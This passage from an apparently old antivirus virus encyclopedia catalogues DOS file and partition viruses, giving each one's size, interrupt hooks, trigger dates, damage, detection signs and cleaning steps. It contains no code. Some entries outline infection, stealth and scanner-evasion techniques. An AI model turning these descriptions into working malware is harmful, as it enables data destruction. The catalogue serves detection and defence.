  8007. Executing Procedure: Searches for all uninfected COM files on
  8008. current or father directories and infects them (Length
  8009. of infectable files must be less than 32768 bytes).
  8010.  
  8011. Damage: None
  8012.  
  8013. Detecting Method:
  8014. 1) Date and time of infected files changed.
  8015. 2) Infected files will increase about 238 bytes.
  8016.  
  8017. [Enet-613]
  8018. Virus Name: Enet-613
  8019. Virus Type: COM File infector
  8020. Virus Length:  613 bytes
  8021.  
  8022. Executing Procedure:
  8023. Infects all COM files on current directory (It does not infect
  8024. same file again). Then it will check whether current day is
  8025. Sunday. If it is, it displays a message and waits until a key is pressed
  8026. . Then it changes the word at address 4000:0013h of RAM to 0200h,
  8027. and then calls INT 19h to reboot the system.
  8028.  
  8029. Damage: None
  8030.  
  8031. Note:
  8032. 1) Date and time of infected files does not change.
  8033. 2) Infected files will increase from 613-628 bytes.
  8034.  
  8035. [Fri-13D]
  8036. Virus Name: Fri-13-D
  8037. Virus Type: COM File infector
  8038. Virus Length:  416 bytes
  8039.  
  8040. Executing Procedure: When an infected program is executed, it will
  8041. infect all COM files (except COMMAND.COM) on current directory
  8042. (it does not infect same file again). Then checks whether current
  8043. day is  13 and a Friday. If it is, it deletes itself and then goes
  8044. back to the original routine.
  8045.  
  8046. Damage: An infected program will delete itself if you run it
  8047. on Friday the 13th.
  8048.  
  8049. Detecting Method:
  8050. 1) Date and time of infected files changed.
  8051. 2) Infected files will increase from  416-431 bytes.
  8052.  
  8053. [Ash]
  8054. Virus Name: Ash
  8055. Virus Type: COM File infector
  8056. Virus Length:  4+276 bytes
  8057.  
  8058. Executing Procedure: Infects all infectable COM files on current
  8059. directory (It does not  infect same file again, and does not
  8060. infect file which length is larger than 64768). If the number of
  8061. new infected files is less than 2, it will search for infectable
  8062. files on its father and father's father directory.
  8063.  
  8064. Damage: None
  8065.  
  8066. Note: Date and time of infected files changed. Detecting Method:
  8067. Infected files will increase by 280 bytes.
  8068.  
  8069. [Bljec-1]
  8070. Virus Name: Bljec-1
  8071. Virus Type: COM File infector
  8072. Virus Length:  301 bytes
  8073.  
  8074. Executing Procedure: Checks whether current month is September.
  8075. If it is, it will format the first 16 sectors of current diskette,
  8076. then infects all COM files on current directory.
  8077.  
  8078. Damage: It will format first 16 sectors of current diskette if
  8079. current month is September.
  8080.  
  8081. Note: Date and time of infected files does not change.
  8082.  
  8083. Detecting Method: Infected files will increase by 301 bytes.
  8084.  
  8085. [Cas-927]
  8086. Virus Name: Cas-927
  8087. Virus Type: Memory Resident(HiMem), COM File infector
  8088. Virus Length:  3+927 bytes
  8089.  
  8090. Executing Procedure: The virus will decode first. Then check
  8091. whether it has stayed resident in  memory. If not, it will stay
  8092. resident in high memory. Then hook INT21h, INT 1Ch, INT 28h and
  8093. go back to the original routine.
  8094.  
  8095. Vectors hooked:
  8096. INT 21h:
  8097. 1) Hook INT 21h to check whether it has stayed resident in
  8098.    memory.
  8099. 2) Hook INT 21h(AX=4B00h) to infect files. If the program to be
  8100.    executed is an uninfected COM file and its length is not
  8101.    larger than 63500 bytes, infect it.
  8102. INT 28h:
  8103. Hook INT 28h to check whether current month is an even month,
  8104. current day is Sunday, Tuesday, Thursday, or Saturday, and
  8105. current time is 11:11:11. If all these conditions are satisfied, it
  8106. will set a damage_flag used by INT 1Ch later.
  8107. INT 1Ch:
  8108. Hook INT 1Ch to cooperate with INT 28h. When the damage_flag is set,
  8109. it will change all capital characters on screen to small
  8110. characters.
  8111.  
  8112. Damage: None
  8113.  
  8114. Note:
  8115. 1) This virus stays resident in high memory (It will take 7A
  8116.    pares).
  8117. 2) Infected files will increase by 855 bytes.
  8118. 3) Date and time of infected files do not change.
  8119.  
  8120. [CSFK]
  8121. Virus Name: Cfsk
  8122. Virus Type: Memory Resident(MCB), COM File infector
  8123. Virus Length:  5+918 bytes
  8124.  
  8125. Executing Procedure: The virus will decode first. Then check
  8126. whether it has stayed resident in  memory. If not, stay resident
  8127. in memory. Then hook INT21h and go back to the original routine.
  8128.  
  8129. Vectors hooked:
  8130. 1) Hook INT 21h to check whether it has stayed resident in
  8131.    memory.
  8132. 2) Hook INT 21(AH=4Bh) to infect files. If the program to be
  8133.    executed is an uninfected COM file and its length is between
  8134.    25 bytes and 63500 bytes, it infects it.
  8135.  
  8136. Damage: None
  8137.  
  8138. Note:
  8139. 1) This virus stays resident in memory (MCB) (It will take 6A
  8140.    pares).
  8141. 2) Infected files will increase by 918 bytes.
  8142. 3) Date and time of infected files do not change.
  8143.  
  8144. [Warrier1]
  8145. Virus Name: Warrier1
  8146. Virus Type: Memory Resident(HiMem), COM File infector
  8147. Virus Length: 300 bytes
  8148.  
  8149. Executing Procedure: The virus will decode first. Then check
  8150. whether it has stayed resident in  memory. If not, it stays resident
  8151. in high memory. Then hooks INT21h and goes back to the original
  8152. routine.
  8153.  
  8154. Vectors hooked: Hook INT 21h(AX=4B00h) to infect files. If the
  8155. program to be executed is an uninfected COM file (except
  8156. COMMAND.COM), it infects it.
  8157.  
  8158. Damage: None
  8159.  
  8160. Note:
  8161. 1) This virus stays resident in high memory (It will take 61
  8162.    pares).
  8163. 2) Date and time of infected files do not change.
  8164. 3) The change of Infected files' length is:
  8165.    i) If original files' length is not larger than 768 bytes,
  8166.       infected files will be 1536 bytes.
  8167.   ii) If original files' length is larger than 768 bytes,
  8168.       infected files will increases by 768 bytes.
  8169.  
  8170. Cleaning Method: Omit first 768 bytes from infected files.
  8171.  
  8172. [Athens]
  8173. Virus Name: Athens
  8174. Virus Type: Memory Resident(HiMem), COM & EXE File infector
  8175. Virus Length: 1,463 bytes
  8176.  
  8177. Executing Procedure: The virus will decode first. Then it will
  8178. check whether it has stayed resident in memory. If not, it will
  8179. stay resident in high memory. Then it hooks INT21h and goes back to the
  8180. original routine.
  8181.  
  8182. Vectors hooked:
  8183. 1) Hooks INT 21h to check whether it has stayed resident in
  8184.    memory.
  8185. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
  8186.    executed is an uninfected EXE or COM (except COMMAND.COM)
  8187.    file, it infects it.
  8188. 3) Hooks INT 21h (AX=4Eh,4Fh,11h,12h) to check
  8189.    whether the current program has been infected. If it has, it
  8190.    will change file's length and date in DTA to their original
  8191.    data. So, you can not see the change of infected files'
  8192.    length and date when the memory was infected.
  8193.  
  8194. Damage: None
  8195.  
  8196. Note:
  8197. 1) This virus stays resident in high memory (It will take DFh
  8198.    pares).
  8199. 2) Infected files will increase by 1463 bytes. You can not see
  8200.    the increase when the virus is in current memory.
  8201. 3) Date and time of infected files is changed. You can not see the
  8202.    change when the virus is in current memory.
  8203.  
  8204. [Commy]
  8205. Virus Name: Commy
  8206. Virus Type: COM File infector
  8207. Virus Length:  998 bytes
  8208.  
  8209. Executing Procedure: The virus will decode first. Then it checks
  8210. whether current minute is less than 10, and the current DOS
  8211. version is above 3.0. If all these conditions are satisfied, it will
  8212. search for an COM program (Its length is between 4567 bytes and
  8213. 64520 bytes), and infect it (It infects only one file once a
  8214. time). Then it goes back to the original routine. The searching path
  8215. is the path set by current PATH. In addition, when this virus is
  8216. infecting a program, it will encode its time to verify that
  8217. this file is infected.
  8218.  
  8219. Damage: None
  8220.  
  8221. Note:
  8222. 1) Infected files will increase by 998 bytes.
  8223. 2) The dates of infected files do not change.
  8224. 3) The time of infected files changed because the original time
  8225.    encoded.
  8226.  
  8227. [Arriba]
  8228. Virus Name: Arriba
  8229. Virus Type: Memory resident, COM & EXE File infector
  8230. Virus Length: 1,590 bytes
  8231.  
  8232. Executing Procedure: Checks whether it has stayed resident in
  8233. memory. If it has, it will go back to the original routine
  8234. directly. Otherwise, it will move itself to high memory. Then
  8235. hook INT21h and check whether current date is November 20. If it
  8236. is, hook INT 08h and go back to the original routine.
  8237.  
  8238. Vectors hooked: Hook INT 08h to display a message and then halt
  8239. system. Hook INT 21h(AX=4B00) to check whether the program being
  8240. executed has been infected. If not, it will infect it in
  8241. different ways according to its type: If it is a COM file, it
  8242. will write virus code into the beginning of original file,
  8243. followed by original file's code, and attach 2 bytes of
  8244. identified code to the end of file to verify that this file has
  8245. been infected. If it is a EXE file, it will attach virus code to
  8246. the end of original file's code. Then change the head of file and
  8247. attach identified code to the end.
  8248.  
  8249. Damage: No other damage action except halting system when INT 08h
  8250. called.
  8251.  
  8252. Note:
  8253. 1) The date and time of infected files does not change.
  8254. 2) The method that the virus moves code is special. First, it will
  8255.    test whether the address A0000h is writable. If not, it moves 1000
  8256.    bytes of this area to a lower address repeatedly until it finds a
  8257.    writable area. Then it moves virus codes into this area. You will
  8258.    not see any changes of memory by MEM program because it has not
  8259.    changed the size of the memory's blocks. This method may cause
  8260.    damage to the virus code, and may even halt system.
  8261.  
  8262. Detecting Method: Infected files will increase 1590 bytes.
  8263.  
  8264. [Ekoterror]
  8265. Virus Name: Ekoterror
  8266. Virus Type: Memory Resident(HiMem, COM File  & PARTITION infector
  8267. Virus Length: 2,048 bytes
  8268.  
  8269. Executing Procedure:
  8270. 1) When an infected program is executed, it will write virus code
  8271.    to the PARTITION. It will not check whether the PARTITION has
  8272.    been infected when the virus invades the PARTITION. This would make
  8273.    data in the Partition disappear after executing infected
  8274.    programs several times.
  8275. 2) If the virus invades the system when booting up from a hard diskette, it
  8276.    will hook INT 08h,INT 13h, and call INT 08h to check whether
  8277.    DOS has been loaded. If it has, it hooks INT 21h.
  8278.  
  8279. Vectors hooked: Hooks INT 08h to check whether DOS it has been loaded.
  8280. If it has, it hooks INT 21h. Hooks INT 13h to check whether the sector
  8281. loaded is the PARTITION. If it is, it will revert back or
  8282. change the data of the original PARTITION. Hooks INT 21h to infect COM
  8283. files when reading or writing files.
  8284.  
  8285. Damage: PARTITION destroyed by times of being invaded.
  8286.  
  8287. Note:
  8288. 1) If virus has invaded PARTITION, you can not load or save data
  8289.    on the hard diskette if the system booted up from a soft diskette
  8290.    (Because the data in PARTITION has changed).
  8291. 2) If DOS Version is not suitable, or the code of INT 08h does not
  8292.    conform to the DOS loading process, the virus can not hook INT 21.
  8293.    This time it cannot infect any files.
  8294.  
  8295. Cleaning Method: Boot up from an uninfected diskette. Then use a
  8296. program that can read or write data on a hard diskette (like
  8297. Debug) to write the data of the original PARTITION back (The virus moves
  8298. the data of the original PARTITION to 0 side, 0 track, 5 sector. Every
  8299. time it is infected, it will add 4 to the number of sectors).
  8300.  
  8301. [AST-976]
  8302. Virus Name: Ast-976
  8303. Virus Type: Memory Resident, COM File infector
  8304. Virus Length:  976 bytes
  8305.  
  8306. Executing Procedure: The virus will decode first. Then it will
  8307. check whether it has stayed resident in memory. If not, it will
  8308. stay resident in high memory. Then it hooks INT21h and infects all COM
  8309. files on the current directory (It does not infect the same file again).
  8310. At last, it checks whether the current minute is 17. If it is, it makes a
  8311. little change in the PARTITION to keep the system from booting
  8312. correctly.
  8313.  
  8314. Vectors hooked:
  8315. 1) Hooks INT 21h to check whether it has stayed resident in
  8316.    memory.
  8317. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
  8318.    executed is an uninfected COM file, it infects it.
  8319.  
  8320. Damage: When the virus breaks out, it will make the screen flash once
  8321. . Then it changes data in the PARTITION. The change is achieved by
  8322. XOR replacing every fourth byte of the four PARTITION records with 55 (There
  8323. are four PARTITION records in the PARTITION table).
  8324.  
  8325. Note: The date and time of infected files does not change.
  8326.  
  8327. Detecting Method:  Infected files will increase by 976 bytes.
  8328.  
  8329. [AST-1010]
  8330. Virus Name: Ast-1010
  8331. Virus Type: Memory Resident, COM & EXE File
  8332.             infector
  8333. Virus Length: 1,010 bytes
  8334.  
  8335. Executing Procedure: The virus will decode first. Then it will
  8336. check whether it has stayed resident in memory. If not, it will
  8337. stay resident in high memory. Then it hooks INT21h and infects all COM
  8338. & EXE files on the current directory (It does not infect the same file
  8339. again). At last, it checks whether the current day is the 16th. If it is, it makes
  8340. changes the PARTITION to keep the system from booting correctly.
  8341.  
  8342. Vectors hooked:
  8343. 1) Hooks INT 21h to check whether it has stayed resident in
  8344.    memory.
  8345. 2) Hook INT 21(AX=4B00h),to infect files. If the program to be
  8346.    executed is an uninfected COM or EXE file,  it infects it.
  8347.  
  8348. Damage: When the virus breaks out, first it will make the screen flash
  8349. once. Then it changes some data in the partition. The change is achieved by
  8350. XOR replacing every fourth byte of four partition records with 55 (There
  8351. are four partition records in partition table).
  8352.  
  8353. Note:
  8354. 1) Date and time of infected files does not change.
  8355. 2) The method of checking whether it has stayed resident in
  8356.    memory is same as the AST-976 virus. So, these two viruses can
  8357.    not stay resident in memory at the same time.
  8358.  
  8359. Detecting Method:  Infected files will increase by 1010 bytes.
  8360.  
  8361. [Filler]
  8362. Virus Name: Filler
  8363. Virus Type: File infector
  8364.  
  8365. Executing Procedure: During the period of being executed, it will
  8366. write some rubbish into some sectors on the A diskette. It has no
  8367. other damage actions.
  8368.  
  8369. Damage: Destroys some sectors on A diskette (Starts from 0 side, 28
  8370. track, 1 sectors, damages 8 sectors).
  8371.  
  8372. $#Path
  8373. Virus Name: Path
  8374. Virus Type: COM File infector
  8375. Virus Length:  3+906 bytes
  8376.  
  8377. Executing Procedure: It will decode its later half first.
  8378. Then it checks whether there have been some programs infected. If
  8379. there have, it infects only one program. Otherwise, it goes back to run
  8380. the original routine. The searching path is the path set in PATH.
  8381. The condition of the infectable file is that it must be an uninfected
  8382. COM file, and its length must be between 10 bytes and 64000 bytes.
  8383.  
  8384. Damage: None
  8385.  
  8386. Note:
  8387. 1) Does not stay resident in memory.
  8388. 2) Date and time of infected files does not change.
  8389. 3) Infected files will increase by 906+G bytes (0<=G<=247).
  8390.  
  8391. [Flower]
  8392. Virus Name: Flower
  8393. Virus Type: EXE File infector
  8394. Virus Length:  883 bytes
  8395.  
  8396. Executing Procedure: It will decode its encoded section first.
  8397. Then it checks whether the current date is November 11, or whether the
  8398. virus Version is not less than 174. If either of these conditions are
  8399. satisfied, it destroys the original program (Document) and go back to run
  8400. the original routine. Otherwise, it will search for the first uninfected
  8401. program on the current directory and infect it. Then it searches for the first
  8402. uninfected program on the subdirectory under the root directory and
  8403. infects it. Then it goes back to run the original routine. Every infected
  8404. file has its own number. When it infects a file, it will increase
  8405. the current number by 1. This number will be delivered to the next
  8406. infection process.
  8407.  
  8408. Damage: When the virus breaks out, it will attach a procedure
  8409. to the original procedure to display a message (An English poem whose
  8410. title is "FLOWER"). Then it destroys the original procedure by
  8411. overwriting its front data.
  8412.  
  8413. Note: Date of infected files does not change. The time changes
  8414. because the time has been encoded to verify that the file is infected.
  8415.  
  8416. [Grunt-3]
  8417. Virus Name: Grunt-3
  8418. Virus Type: COM File infector
  8419. Virus Length:  3+473 bytes
  8420.  
  8421. Executing Procedure: It will decode its later half section first.
  8422. Then check if there is an uninfected COM & EXE file on current
  8423. and it's all father directory. If there is, it checks whether the current
  8424. year is not less than 1993 and it is Friday. If it is, it does not
  8425. infect any files except for displaying the following:
  8426.  
  8427.     "This is a hot  LZ ...Eradicating the Enemy!".
  8428.  
  8429. Otherwise, it infects it (It infects only one file once a time).
  8430.  
  8431. Damage: None
  8432.  
  8433. Note:
  8434. 1) Does not stay resident in memory.
  8435. 2) Date and time of infected files do not change.
  8436.  
  8437. Detecting Method: Infected files will increase by 473 bytes.
  8438.  
  8439. [Ultrasik-1967]
  8440. Virus Name: Ultrasik-1967
  8441. Virus Type: EXE File infector
  8442. Virus Length:  1967 bytes
  8443.  
  8444. Executing Procedure: Searches for an uninfected EXE file and
  8445. infects it. The searching path is from the current directory to its
  8446. subdirectory, to subdirectories under the last subdirectory, to the root
  8447. directory, to subdirectories under the root directory. After that, it
  8448. will go back to the original routine. If there is not an
  8449. infectable file, it halts the system (The original plan is to format C
  8450. diskette.  But it instead halts the system because due to a bad
  8451. instruction in virus's procedure).
  8452.  
  8453. Damage: None
  8454.  
  8455. Note: Date and time of infected files does not change.
  8456.  
  8457. Detecting Method: Length of infected files would increase. The
  8458. algorithm is: First, adds original length to let it become a
  8459. multiple of 16. Then increases it by 1967 bytes.
  8460.  
  8461. [Madden]
  8462. Virus Name: Madden
  8463. Virus Type: EXE File infector
  8464. Virus Length:  1988 bytes
  8465.  
  8466. Executing Procedure: Searches for an uninfected EXE file and
  8467. infects it. The searching path is from the current directory to its
  8468. subdirectory, to the subdirectories under the last subdirectory, to the root
  8469. directory, to the subdirectories under root directory. After that, it
  8470. will go back to the original routine. If there is not an
  8471. infectable file, it will issue a strange sound that stops only
  8472. when the system is rebooted.
  8473.  
  8474. Damage: None
  8475.  
  8476. Note: Date and time of infected files does not change.
  8477.  
  8478. Detecting Method: Length of infected files would increase. The
  8479. algorithm is: First adds to the original length to let it become a
  8480. multiple of 16, and then increases it by 1988 bytes.
  8481.  
  8482. [Madden-B]
  8483. Virus Name: Madden-B
  8484. Virus Type: EXE File infector
  8485. Virus Length:  1440 bytes
  8486.  
  8487. Executing Procedure: Searches for an uninfected EXE file and
  8488. infects it. The searching path is from the current directory to its
  8489. subdirectory, to the subdirectories under the last subdirectory, to the root
  8490. directory, to the subdirectories under the root directory. After that,
  8491. it will go back to the original routine. If there is not an
  8492. infectable file, it will issue a sound from high to low, from low
  8493. to high, and so on until the system is rebooted.
  8494.  
  8495. Damage: None
  8496.  
  8497. Note: Date and time of infected files does not change.
  8498.  
  8499. Detecting Method: Length of infected files would increase. The
  8500. algorithm is: First adds  original length to let it become a
  8501. multiple of 16, and then increases it by 1440 bytes.
  8502.  
  8503. [Prime]
  8504. Virus Name: Prime
  8505. Virus Type: *.C*(Mainly *.COM) File infector
  8506. Virus Length:  580 bytes
  8507.  
  8508. Executing Procedure: It will decode its later half section first.
  8509. Then it checks whether the current day is 1. If it is, it displays a message
  8510. and rotates screen from left to right once. No matter what
  8511. current day is, it will search an uninfected file on the
  8512. current directory and infect it. 
  8513. Then end. The method of
  8514. infection is:
  8515. 1) Get original codes and encode them with F3h.
  8516. 2) Get system time and encode it with virus's later half codes.
  8517. 3) Attach virus code to original file, followed by original
  8518.    codes.
  8519.  
  8520. Vectors hooked: Hook INT 01h, INT 03h to prevent Debug program.
  8521. When Debug program executed, it will jump to FE05Bh to reboot
  8522. system. Hook INT 24h to prevent write protection on current
  8523. diskette. When INT 24h called, it will halt system because
  8524. some procedure of virus is bad.
  8525.  
  8526. Damage: Original programs encoded. So, they will not be executed
  8527. after virus executed.
  8528.  
  8529. Note:
  8530. 1) Does not stay resident in memory.
  8531. 2) The affair listed later will happen because some procedure of
  8532.    virus is bad. If there are *.C* files on the current directory but
  8533.    these files are not infectable (They have already been
  8534.    infected), the system will be halted after the virus has been
  8535.    executed. This will not happen on other conditions.
  8536. 3) Date and time of infected files do not change.
  8537.  
  8538. Detecting Method: Infected files will increase by 580 bytes.
  8539.  
  8540. Cleaning Method: Omit First 580 bytes of infected files. The
  8541. surplus bytes would XOR with F3h one by one.
  8542.  
  8543. [PSV-354]
  8544. Virus Name: Psv-354
  8545. Virus Type: COM File infector
  8546. Virus Length:  354 bytes
  8547.  
  8548. Executing Procedure: It will decode its later half section first.
  8549. Then check whether there have some programs infectable. If there
  8550. have, infect only one of them. Otherwise, go back to run original
  8551. routine. The condition of infectable file is that it must be an
  8552. uninfected COM file, and its length is between 150 bytes and
  8553. 65000 bytes.
  8554.  
  8555. Damage: None
  8556.  
  8557. Note:
  8558. 1) Does not stay resident in memory.
  8559. 2) Date and time of infected files do not change.
  8560. 3) Does not infect the COMMAND.COM of DOS 5.0
  8561.  
  8562. Detecting Method: Infected files will increase by 354 bytes.
  8563.  
  8564. [PCBB]
  8565. Virus Name: Pcbb
  8566. Virus Type: Memory resident, COM File infector
  8567. Virus Length:  3+(1675-1687) bytes
  8568.  
  8569. Executing Procedure: It will decode its later half section first.
  8570. Then check whether it has stayed in memory. If not, it will move
  8571. itself to high memory. Then hook  INT 21h,INT 09h,INT 1Ch and go
  8572. back to run original routine. The infection happens when
  8573. executing program, copying file, changing file's attribute,
  8574. opening file, closing file, and renaming file (AH=56h). When it
  8575. infects a file, it will check what day of the week is it today
  8576. first. There are seven encoding modes according to the judgment.
  8577. It does not infect same file again, and length of infectable
  8578. files must between 16 bytes and 61440 bytes.
  8579.  
  8580. Symptom: When virus breaks out, the screens displays nothing every
  8581. time the number of keys struck is equal to 957. This time, it
  8582. will reset the counter to count continually. You can press down
  8583. Alt, Control, Shift of left & right together to make the screen
  8584. display again.
  8585.  
  8586. Damage: None
  8587.  
  8588. Note: It stays resident in memory (It will take 4K bytes).
  8589.  
  8590. Detecting Method:
  8591. 1) Date and time of infected files changed.
  8592. 2) Infected files will increase by 1675,1677,1679,
  8593.    1679,1680,1683,1687 bytes according to what day of the week is
  8594.    it today (From Sunday to Saturday).
  8595. 3) "PCBB" is attached to the end of infected file.
  8596.  
  8597. [Comspec]
  8598. Virus Name: Comspec
  8599. Virus Type: File Infector
  8600. Virus Length:  3424 bytes
  8601.  
  8602. Executing Procedure: It will execute COMMAND.COM to create 6
  8603. copies of virus file by using 6 file names in C:\DOS directory
  8604. (The copies saved in current directory). If there is no C:\DOS
  8605. directory, it will create a file named "COMSPEC".
  8606.  
  8607. Damage: It would overwrite 6 files if we execute it on C:\DOS
  8608. directory.
  8609.  
  8610. Detecting Method: Length of infected files is 3424.
  8611.  
  8612. [T-1000]
  8613. Virus Name: T-1000
  8614. Virus Type: COM File infector
  8615. Virus Length:  128 bytes
  8616.  
  8617. Executing Procedure: It will decode its later half section first.
  8618. Then infect all COM files on current directory. The method of
  8619. infection is: Get system time and encode it with original
  8620. procedure. Then overwrite its first 128 bytes by virus code. So,
  8621. if it is less than 128 bytes, it will be 128 bytes after it has been
  8622. infected. Otherwise, the size of it does not change.
  8623.  
  8624. Damage: It will overwrite the first 127 bytes of original files by
  8625. virus code. So the original files destroyed.
  8626.  
  8627. Detecting Method: Date and time of infected files changed.
  8628.  
  8629. [Seneca]
  8630. Virus Name: Seneca
  8631. Virus Type: EXE File infector
  8632. Virus Length:  392 bytes
  8633.  
  8634. Executing Procedure: It will get system date & time. There are
  8635. three conditions of infection:
  8636. (1)Current  year is not larger than 1980 and current minute is
  8637.    less than 30, or current year is larger than 1980 and current
  8638.    day is not November 25: It will infect all EXE files on
  8639.    current and it's all father directories.
  8640. (2)Current  year is not larger than 1980 and current minute is
  8641.    not less 30: It will display a message as: "You shouldn't use
  8642.    your computer so much, its bad for you and your computer.".
  8643.    Then destroy current diskette.
  8644. (3)current year is larger than 1980 and current day is November
  8645.    25: It will display a message as:
  8646.  
  8647.        "HEY EVERYONE!!!"
  8648.        "Its Seneca's B-Day !  Let's Party!"
  8649.  
  8650.    Then destroy current diskette. The method of destroying
  8651.    diskette of (2) & (3) is:  Write some data into first 255
  8652.    sectors of diskette. So many important data of the diskette
  8653.    will lost.
  8654.  
  8655. Damage: In condition (1), infected files destroyed because their
  8656. first 392 bytes overwritten. In condition (2) & (3), illustration
  8657. has listed above.
  8658.  
  8659. Note: Date and time of infected files do not change.
  8660.  
  8661. Detecting Method: You can see messages listed above by typing an
  8662. infected file.
  8663.  
  8664. [Version]
  8665. Virus Name: Version
  8666. Virus Type: Memory resident, COM File infector
  8667. Virus Length:  708 bytes
  8668.  
  8669. Executing Procedure: First, It will decode its first 3 bytes.
  8670. Then check whether it has stayed resident in memory. If it has,
  8671. go back to the original routine directly. Otherwise, it will stay
  8672. resident in high memory, then hook INT21h  and   go back to the
  8673. original routine.
  8674.  
  8675. Vectors hooked:
  8676. 1) Hook INT 21h(AH=30h) to make the result of getting DOS Version
  8677.    is not right.
  8678. 2) Hook INT 21h(AX=4203h) to verify that memory has been infected
  8679.    by returning AX=6969h.
  8680. 3) Hook INT 21h(AX=4B00h)to infect COM files.
  8681.  
  8682. Damage: The call of getting DOS Version could not run correctly.
  8683.  
  8684. Note: This virus can not run correctly. That mean it is just a
  8685. half finished product.
  8686.  
  8687. Detecting Method:
  8688. 1) Date and time of infected files changed.
  8689. 2) Infected files will increase by 705 bytes.
  8690.  
  8691. [Versikee-1326]
  8692. Virus Name: Versikee-1326
  8693. Virus Type: EXE File infector
  8694. Virus Length:  1326 bytes
  8695.  
  8696. Executing Procedure: Search for an uninfected EXE file and
  8697. infects it (It infects only one file once a time). The searching
  8698. path is from current directory to its subdirectory,  to
  8699. subdirectories under last subdirectory, to root directory, to
  8700. subdirectories under root directory. If there is an infectable
  8701. file, it will check system time. If current second is a multiple
  8702. of 8, destroy first 5 byte of the file. Otherwise, infect it. At
  8703. last, go back to original routine.
  8704.  
  8705. Damage: Sometimes the first 5 bytes of files destroyed.
  8706.  
  8707. Note: Date and time of infected files do not change.
  8708.  
  8709. Detecting Method: Length of infected files would increase. The
  8710. algorithm is: First, adds original length to let it became a
  8711. multiple of 16, and then increase it by 1326 bytes.
  8712.  
  8713. [163]
  8714. Virus Name: 163
  8715. Virus Type: COM File infector
  8716. Virus Length:  163 bytes
  8717.  
  8718. Executing Procedure: It will infect first uninfected COM file on
  8719. current directory. If there are no COM  files on current
  8720. directory or it has infected one, go back to original routine.
  8721.  
  8722. Damage: None
  8723.  
  8724. Note:
  8725. 1) The method of infection is:
  8726.    (1)Move first 163 bytes of original file to the end.
  8727.    (2)Write virus codes into its first 163 bytes.
  8728.    So original file would be destroyed if it is less than 163
  8729.    bytes.
  8730. 2) Does not infect same file again.
  8731. 3) Date and time of infected files do not change.
  8732.  
  8733. Detecting Method:
  8734. 1) Infected files will increase by 163 bytes.
  8735. 2) Checks whether there is "*.COM" from 19Dh byte of a file.
  8736.  
  8737. [Vengence-A]
  8738. Virus Name: Vengence-A
  8739. Other Name: Vengence-194
  8740. Virus Type: *.C* File infector
  8741. Virus Length:  194 bytes
  8742.  
  8743. Executing Procedure: It will infect all *.C* files on current
  8744. directory.
  8745.  
  8746. The method of infection is: Overwrite files' first 194 bytes by
  8747. virus code. So if original file is less than 194 bytes, they will
  8748. be 194 bytes after been infected. Otherwise, size of them does
  8749. not change.
  8750.  
  8751. Damage: It will overwrite first 194 bytes of original files by
  8752. virus code. So the original files destroyed.
  8753.  
  8754. Detecting Method:
  8755. 1) Date and time of infected files changed.
  8756. 2) There is a text at the end of infected files, the text is:
  8757.  
  8758.     "Vengence-A virus. Lastest release from Swedish Virus
  8759.      Association. Released 7th of May 1992. Happy hacking and
  8760.      greetings to all Virus writers..."
  8761.  
  8762. [Vengence-B]
  8763. Virus Name: Vengence-B
  8764. Other Name: Vengence-252
  8765. Virus Type: *.C* (Mainly COM) File infector
  8766. Virus Length:  252 bytes
  8767.  
  8768. Executing Procedure: It will infect first *.C* file on current
  8769. directory.
  8770.  
  8771. The method of infection is: Overwrite file's first 252 bytes by
  8772. virus code. So if original file is less than 252 bytes, it will
  8773. be 252 bytes after being infected. Otherwise, the size of it does not
  8774. change.
  8775.  
  8776. Damage: It will overwrite first 252 bytes of original files by
  8777. virus code. So original files destroyed.
  8778.  
  8779. Note: Date and time of infected files do not change.
  8780.  
  8781. Detecting Method:
  8782. There is a text at the end of infected files, the text is:
  8783.  
  8784.     "Vengence-B virus. Lastest release from Swedish Virus
  8785.      Association. Released 8th of May 1992. Satan will come and
  8786.      rule his world and his people!"
  8787.  
  8788. [Vengence-C]
  8789. Virus Name: Vengence-C
  8790. Other Name: Vengence-390
  8791. Virus Type: *.C* (Mainly COM) File infector
  8792. Virus Length:  390 bytes
  8793.  
  8794. Executing Procedure: It will infect the first *.C* file on current
  8795. directory.
  8796.  
  8797. The method of infection is: Overwrite file's first 390 bytes by
  8798. virus code. So if original file is less than 390 bytes, it will
  8799. be 390 bytes after been infected. Otherwise, size of it does not
  8800. change.
  8801.  
  8802. Damage: It will overwrite first 390 bytes of original files by
  8803. virus code. So original files destroyed.
  8804.  
  8805. Note:
  8806. 1) Date and time of infected files does not change.
  8807. 2) When virus executed, it will check if there are some scanning
  8808.    virus software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK,
  8809.    ThunderByte, TBSCANX. If any of these software are found, stop
  8810.    executing.
  8811.  
  8812. Detecting Method:
  8813. There is a text at the end of infected files, the text is:
  8814.  
  8815.     "Vengence-C virus. Lastest release from Swedish Virus
  8816.      Association. Released 8th of May 1992. Satan will come and
  8817.      rule his world and his people!"
  8818.  
  8819. [Vengence-D]
  8820. Virus Name: Vengence-D
  8821. Other Name: Vengence-435
  8822. Virus Type: *.C* (Mainly COM) File infector
  8823. Virus Length:  435 bytes
  8824.  
  8825. Executing Procedure: First, it will check whether current time is
  8826. 12:00(AM). If it is, displays a message and then increases system
  8827. time by an hour. The message is:
  8828.  
  8829.     "Vengence-D virus. Lastest release from Swedish Virus
  8830.      Association. Released 8th of May 1992. Satan will come and
  8831.      rule his world and his people!"
  8832.  
  8833. Then it will infect first *.C* file on current directory.
  8834.  
  8835. The method of infection is: Overwrite file's first 435 bytes by
  8836. virus code. So if original file is less than 435 bytes, it will
  8837. be 435 bytes after it has been infected. Otherwise, the size of it does not
  8838. change.
  8839.  
  8840. Damage: It will overwrite first 435 bytes of original files by
  8841. virus code. So original files destroyed.
  8842.  
  8843. Note:
  8844. 1) Date and time of infected files do not change.
  8845. 2) When virus executed, it will check whether there are some
  8846.    scanning virus software like F-LOCK, F-POPUP, F-FCHK,
  8847.    F-DLOCK, ThunderByte, TBSCANX . If any   of these is found, it
  8848.    will stop executing.
  8849.  
  8850. Detecting Method: There is a text at the end of infected files,
  8851. the text has listed above.
  8852.  
  8853. [Vengence-F]
  8854. Virus Name: Vengence-F
  8855. Other Name: Vengence-656
  8856. Virus Type: *.C* (Mainly COM) File infector
  8857. Virus Length:  656 bytes
  8858.  
  8859. Executing Procedure: First, it will check whether current time is
  8860. 12:00(AM). if it is, display a message and then increase system
  8861. time by an hour. The message is:
  8862.  
  8863.     "Vengence-F virus. Debugging session unlimited."
  8864.  
  8865. Then it will infect first *.C* file on current , its father, its
  8866. father's father directory, and so on.
  8867.  
